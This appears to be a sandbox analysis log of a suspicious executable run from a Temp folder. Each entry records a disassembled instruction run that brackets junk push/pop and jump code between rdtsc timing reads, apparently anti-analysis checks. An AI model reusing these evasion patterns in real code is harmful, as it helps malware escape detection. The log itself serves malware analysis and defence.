                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4100DA second address: 4100E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4100E0 second address: 4100E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4100E6 second address: 4100EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41303D second address: 413078 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jo 00007F4784F102D8h 0x00000013 jmp 00007F4784F102D2h 0x00000018 jc 00007F4784F102D2h 0x0000001e jg 00007F4784F102C6h 0x00000024 jo 00007F4784F102C6h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4132EB second address: 4132F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F4785B0BF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41341B second address: 413422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 413422 second address: 413498 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4785B0BF51h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F4785B0BF46h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F4785B0BF51h 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007F4785B0BF4Eh 0x00000023 jmp 00007F4785B0BF54h 0x00000028 popad 0x00000029 jnl 00007F4785B0BF5Eh 0x0000002f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41379E second address: 4137A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4137A2 second address: 4137DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4785B0BF4Ah 0x0000000d jmp 00007F4785B0BF52h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F4785B0BF4Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4137DD second address: 4137F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F4784F102C6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F4784F102CAh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4137F9 second address: 4137FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4137FE second address: 413805 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 413805 second address: 41380E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41380E second address: 413814 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 413972 second address: 413990 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4785B0BF58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 413990 second address: 4139A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4784F102CAh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4139A6 second address: 4139AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 413C89 second address: 413C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 413C8D second address: 413C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41B8F2 second address: 41B925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D2h 0x00000007 jmp 00007F4784F102CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jbe 00007F4784F102C6h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F4784F102C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41B925 second address: 41B929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 367E69 second address: 367E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 419B3D second address: 419B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 419B45 second address: 419B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 419B49 second address: 419B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 419B4D second address: 419B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4784F102C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A31C second address: 41A325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A325 second address: 41A329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A5EA second address: 41A5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4785B0BF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A9E1 second address: 41A9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A9E5 second address: 41A9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A9EB second address: 41A9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A9F1 second address: 41A9F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 41A9F7 second address: 41AA13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F4784F102C6h 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 423071 second address: 423093 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4785B0BF46h 0x00000008 jo 00007F4785B0BF46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F4785B0BF52h 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 423093 second address: 4230B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F4784F102C6h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4784F102D2h 0x00000013 jp 00007F4784F102C6h 0x00000019 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4230B9 second address: 4230BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 422A02 second address: 422A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 422A06 second address: 422A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jc 00007F4785B0BF56h 0x0000000e jmp 00007F4785B0BF50h 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop edx 0x00000017 jmp 00007F4785B0BF4Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4785B0BF4Eh 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 42E2F5 second address: 42E338 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4784F102D6h 0x00000008 pop edi 0x00000009 jmp 00007F4784F102CDh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4784F102CFh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F4784F102C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 42E338 second address: 42E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 42DE58 second address: 42DE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4784F102C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4784F102D2h 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4335C3 second address: 4335E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4335E1 second address: 433600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4784F102CEh 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F4784F102C6h 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4395B0 second address: 4395B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 43B754 second address: 43B766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 443B49 second address: 443B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 443B4E second address: 443B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 443B54 second address: 443B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4508BB second address: 4508D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4508D6 second address: 4508DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4508DE second address: 4508FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F4784F102D3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4508FB second address: 45091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F4785B0BF4Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4785B0BF50h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 45091E second address: 450922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44F9D2 second address: 44F9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44F9DB second address: 44F9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44F9DF second address: 44F9F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Ah 0x00000007 jnc 00007F4785B0BF46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44F9F3 second address: 44F9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44F9FB second address: 44F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44F9FF second address: 44FA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FA03 second address: 44FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FA23 second address: 44FA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102D3h 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FA3A second address: 44FA46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FBDD second address: 44FBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FBE2 second address: 44FC21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF56h 0x00000007 pushad 0x00000008 jmp 00007F4785B0BF4Fh 0x0000000d jmp 00007F4785B0BF55h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FC21 second address: 44FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FC2C second address: 44FC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4785B0BF46h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FC3C second address: 44FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 44FC44 second address: 44FC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4537E2 second address: 453802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F4784F102D3h 0x0000000b jnp 00007F4784F102C6h 0x00000011 pop eax 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 453802 second address: 453844 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4785B0BF5Bh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4785B0BF53h 0x0000000f push ecx 0x00000010 jmp 00007F4785B0BF4Bh 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jg 00007F4785B0BF46h 0x00000022 jnl 00007F4785B0BF46h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 45FFDA second address: 45FFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 466459 second address: 46647B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4785B0BF51h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F4785B0BF46h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 46647B second address: 46649C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4784F102D8h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 46649C second address: 4664A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4662F8 second address: 466301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 473B9E second address: 473BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 473BA2 second address: 473BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 473BA6 second address: 473BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
